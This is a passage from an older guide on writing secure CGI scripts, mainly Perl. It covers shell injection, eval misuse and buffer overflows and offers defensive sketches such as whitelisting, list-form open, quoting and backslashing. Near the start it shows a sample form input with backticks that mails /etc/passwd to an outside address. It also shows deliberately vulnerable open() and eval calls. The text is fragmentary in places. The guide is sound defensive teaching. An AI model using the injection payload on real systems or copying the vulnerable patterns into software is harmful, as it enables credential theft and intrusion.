[Because we need to use all of the different quote characters within many
of the examples, literal strings are not surrounded by quotes;
instead user-input strings are shown in a
and program strings are shown with a
background and green text.]
Appendix A: Dangerous Characters
Appendix B: Unsafe Operations
Appendix C: Unsafe Library Functions
We'll start with a few examples of how you can get into trouble. This
bit of Perl code is intended to list the
files in a specific directory and find any that match a user-provided
search specification:
open(FILES, "/bin/ls /data/cardfiles | grep $searchspec |");
Suppose the user enters one of the following onto the form for the above
/bin/ls /data/cardfiles | grep blah `/bin/mailx -s anothervictim email@example.com < /etc/passwd`
Most examples of security problems in CGIs can be traced to the fact that
a shell is unexpectedly started and handed some data from the HTML form.
And in almost every case, the shell is started simply as a convenient way
to start some other outside program. (Our examples focus on just one way
this can happen; a list of possible trouble spots is found in
This brings us to one of the most important recommendations here:
Avoid starting external programs where possible.
It is always best if you can build all of the needed
functionality into your CGI. Even if you start the external program
in a secure
way, it's possible that the external program could manage to do something
insecure that you didn't expect.
But sometimes you have to start external programs. Can it be done securely?
The best way to do this is to make sure the user data is clean of any
trouble. In fact, the best way to make any CGI secure is to completely
isolate the input data from any possible abuse.
Suppose a field on the form has just three possible values: Yes, No, and
Maybe. You could simply compare the input value to each of these three
values, and if it doesn't match, immediately generate an error and give up.
If there is an exact match, then you know the value is completely safe to
use.
As an aside, you can't rely on the HTML form to provide this constraint.
If you have a pulldown menu that contains a list of values, it is still
possible for a malicious user to submit other values you don't list.
They can simply copy your HTML form, and edit the values; this will work
for both the GET and POST methods. Also note that a malicious user can
simply encode things directly in the URL for use with the GET method,
and because of how most CGI libraries work, it will probably work even
if the author was originally using POST.
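
The exact-match check described above for a Yes/No/Maybe field might look something like the following. This is only a minimal sketch: the function name checked_choice and the sample inputs are hypothetical, and a real CGI would report the error to the user rather than just print a message.

```perl
use strict;
use warnings;

# The only values the form field is allowed to carry.
my %allowed = map { $_ => 1 } qw(Yes No Maybe);

# Return the value if it exactly matches an allowed one; otherwise die.
# (checked_choice is a hypothetical name used for illustration.)
sub checked_choice {
    my ($value) = @_;
    die "invalid form value\n"
        unless defined $value && exists $allowed{$value};
    return $value;
}

# Hypothetical inputs: one legitimate, one tampered with.
for my $input ('Maybe', 'Maybe; rm -rf /') {
    my $ok = eval { checked_choice($input) };
    print defined $ok ? "accepted: $ok\n" : "rejected\n";
}
```

Because the comparison is done on the server side, it holds no matter how the request was constructed or which method was used to send it.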
Unfortunately it is not always possible to constrain your input so tightly.
For instance in a search form, you usually can't predict every reasonable
search term in advance. If you can't constrain the input, and you have to
start an outside program, your best bet is to avoid using the shell
to start the outside program.
If you are just
starting the outside program, and the current one is finished, you can just
use exec(), which replaces the current program with the new one. This
command exists (in one form or another) in shell, perl, and C (note that
care must be used in perl; see Appendix B).
In all three languages, you'll be protected from immediate harm (but you still
have to worry about what the new program does with the data). But if you
are opening a pipe to a command (as in the first example), then coding this
is a bit trickier. You need to understand pipe(), fork(), and exec(),
and a complete description is beyond the scope of this article. Perl will
do a fork() and exec() for you with the system() function (note that this
doesn't set up piped I/O); however, care
must be taken to use the correct form, otherwise a shell may still be
used. For more on this, see the line item for the system() function in
Appendix B, in the perl section.
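
As a rough illustration of starting a program without a shell while still reading its output, the sketch below uses the list form of a piped open, which is available in Perl 5.8 and later on Unix-like systems. The helper name run_without_shell and the hostile sample string are hypothetical, and the child program here is simply the perl interpreter itself ($^X) echoing its first argument, so the example does not depend on any particular external command.

```perl
use strict;
use warnings;

# Run a program with its arguments passed as a list, so that no shell ever
# parses them, and return everything the program wrote to standard output.
# (run_without_shell is a hypothetical helper name.)
sub run_without_shell {
    my ($program, @args) = @_;
    # List-form piped open: perl forks and execs $program directly.
    open(my $pipe, '-|', $program, @args)
        or die "cannot start $program: $!";
    my @output = <$pipe>;
    close($pipe);
    return join('', @output);
}

# Hypothetical hostile form input. The semicolon and backticks reach the
# child process as plain argument text and are never interpreted.
my $searchspec = 'blah; `echo pwned`';
my $echoed = run_without_shell($^X, '-e', 'print $ARGV[0]', $searchspec);
print "child received: $echoed\n";
```

The same list-of-arguments idea applies to system() and exec(). As noted above, the program being started still has to treat the data carefully once it receives it.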
If you aren't a system programmer, or if you have particularly complex
file redirection needs, then it may be difficult to avoid the temptation
to let the shell start your external program. Even if you do use exec,
if you don't control the sources to the outside program, you still aren't
protected. So what else can we do to stay safe?
An adequate (but not great) solution is to attempt to strip out all of the
dangerous characters. The problem with this is that the list is long,
and you might miss something. Worse, which characters are dangerous depends
on exactly what you are doing, and which language(s) you are working with.
Consider this example:
open(PHONE, "grep $name /data/phonebook |");
If you can identify every dangerous character and strip them out, that's
great. In some cases, you can even simply limit the input to alphanumerics,
which will provide good protection. But suppose the input is supposed to
include some of these dangerous characters? If you can't filter them out,
the next best thing is to quote the characters so that they won't
be dangerous anymore:
open(PHONE, "grep '$name' /data/phonebook |");
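
Both ideas, limiting input to alphanumerics and single-quoting it for the shell, can be sketched as follows. The function names alnum_only and shell_single_quote are hypothetical. The quoting function assumes a Bourne-style shell, where a single quote inside a single-quoted string has to be written by closing the quotes, adding a backslashed quote, and reopening them.

```perl
use strict;
use warnings;

# Strip everything except ASCII letters and digits.
# (alnum_only is a hypothetical name.)
sub alnum_only {
    my ($text) = @_;
    (my $clean = $text) =~ tr/A-Za-z0-9//cd;
    return $clean;
}

# Wrap a string in single quotes for a Bourne-style shell, rewriting each
# embedded single quote as '\'' so it cannot end the quoted string early.
# (shell_single_quote is a hypothetical name.)
sub shell_single_quote {
    my ($text) = @_;
    $text =~ s/'/'\\''/g;
    return "'$text'";
}

# Hypothetical form input containing shell metacharacters.
my $name = "O'Brien; cat /etc/passwd";
print alnum_only($name), "\n";
print shell_single_quote($name), "\n";
```

Stripping is the safer of the two when the field really should be alphanumeric. Quoting is only as good as your knowledge of every interpreter the string will pass through.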
A simpler way to handle quoting is to use a backslash in front of
each problem character, because
it's a more consistent approach (there's no bizarre exception like quoting
the single quote above). You just have to remember to backslash
everything that might be a problem (See Appendix A).
In many cases, you can even put a backslash in front of every
character (including normal characters) and get the protection you
want without causing any problems. Again though, if the string goes
through additional evaluations, you have to add quoting for each evaluation,
and this becomes very complex (2^n - 1 backslashes are needed in front of
each problem character for n evaluations).
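
A minimal sketch of the backslash approach is shown below, with a hypothetical function name, backslash_escape. It puts a backslash in front of every non-alphanumeric character. As an assumption of this sketch, it refuses newlines and NUL bytes outright, because a shell removes a backslash-newline pair instead of keeping a literal newline. Applying the function a second time shows how the backslashes multiply when the string must survive a second evaluation.

```perl
use strict;
use warnings;

# Put a backslash in front of every character that is not a plain ASCII
# letter or digit. (backslash_escape is a hypothetical name.)
sub backslash_escape {
    my ($text) = @_;
    # Assumption of this sketch: reject characters that backslashing
    # cannot protect in a shell.
    die "refusing newline or NUL\n" if $text =~ /[\n\0]/;
    $text =~ s/([^A-Za-z0-9])/\\$1/g;
    return $text;
}

my $once  = backslash_escape('a;b');    # protected for one evaluation
my $twice = backslash_escape($once);    # protected for two evaluations
print "$once\n$twice\n";
```

After one pass the semicolon carries a single backslash; after two passes it carries three, since each existing backslash needs its own backslash as well.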
Note that with perl, if there are no shell special characters in an
open command, then it won't use the shell to interpret the command.
Unfortunately backslashes are not counted as special characters, so
if you protect through backslashing, the backslashes may not be
stripped, depending on how perl chooses to execute the command. And you can't
rely on perl not using the shell, because if user input contains
special characters, then it may behave differently than it does in
That about covers all the different approaches to making yourself safe from
shells. But this is only one way in which you can get into trouble.
Any interpreted language can expose the input string to unexpected
Normally, in interpreted languages, simply having the information stored
in a variable offers some protection from problems. For instance,
$total = $input*1.15 + 37.50;
can not be subverted by putting
dangerous characters into the $input variable, because
when perl replaces the variable with its value, it has already finished
with checking for backticks and things like that. This is also true if
is your scripting language. However, both of these
languages have an eval statement, which causes a second pass of evaluation
to occur. Here's an example of how this can be handy. Part of the
user input involves selecting a sorting function, which is stored in the
@newlist = eval "sort $howsort \@oldlist";
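
One way to keep the convenience of a user-selected sort without a second pass of evaluation is to look the selection up in a fixed table of sort routines. The sketch below is an illustration of that idea, not the approach the original code takes; the names %sorters and sort_by_choice and the two sort orders are hypothetical.

```perl
use strict;
use warnings;

# Fixed table of permitted sort orders. The user's input is only ever used
# as a hash key and is never evaluated as code.
my %sorters = (
    alphabetical => sub { $_[0] cmp $_[1] },
    numeric      => sub { $_[0] <=> $_[1] },
);

# Sort a list using the named order, or die if the name is not in the table.
# (sort_by_choice is a hypothetical name.)
sub sort_by_choice {
    my ($howsort, @oldlist) = @_;
    my $compare = $sorters{$howsort}
        or die "unknown sort order\n";
    return sort { $compare->($a, $b) } @oldlist;
}

my @newlist = sort_by_choice('numeric', 10, 9, 100);
print "@newlist\n";
```

An input such as a string of perl code simply fails the table lookup, so there is nothing for it to subvert.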
Compiled languages that use the C library functions suffer from a problem
of their own. Because many of the library functions don't do bounds
checking on input strings, it is possible to overflow a buffer while
reading input, and overwrite the stack, and cause the program to execute
machine code that was supplied by the user. So a user can send arbitrarily
long query strings to your program, hoping to overflow the buffer and
run something of their own. Contrary to popular belief, access to source
code is not required; the evildoer just has to keep trying different length
This problem can be avoided by taking care to not let buffers overflow.
If you are using read() in a loop, just add an exit condition for hitting
the end of the buffer. For the library functions, there are safe forms
of most functions. Even if there aren't, you only have to check that
a string is short enough before using it in an unsafe function.
Appendix C lists some unsafe functions, and their
Even if you avoid all of the above general case pitfalls, there's
still room for evil to occur. There are a great number of
application-specific holes that you could leave if you aren't careful.
Here are some examples:
Appendix B: Possibly Unsafe Operations
The following problems should NOT be considered an exhaustive
Simply using these functions doesn't make you safe, you have to make sure
the size limits you use are set to match the buffer sizes you have (minus
one, usually). For example, it is tempting to use read or fread (not
listed here because they're generally safe), with the size set to the
value from the Content-Length HTTP field, but this can lead to buffer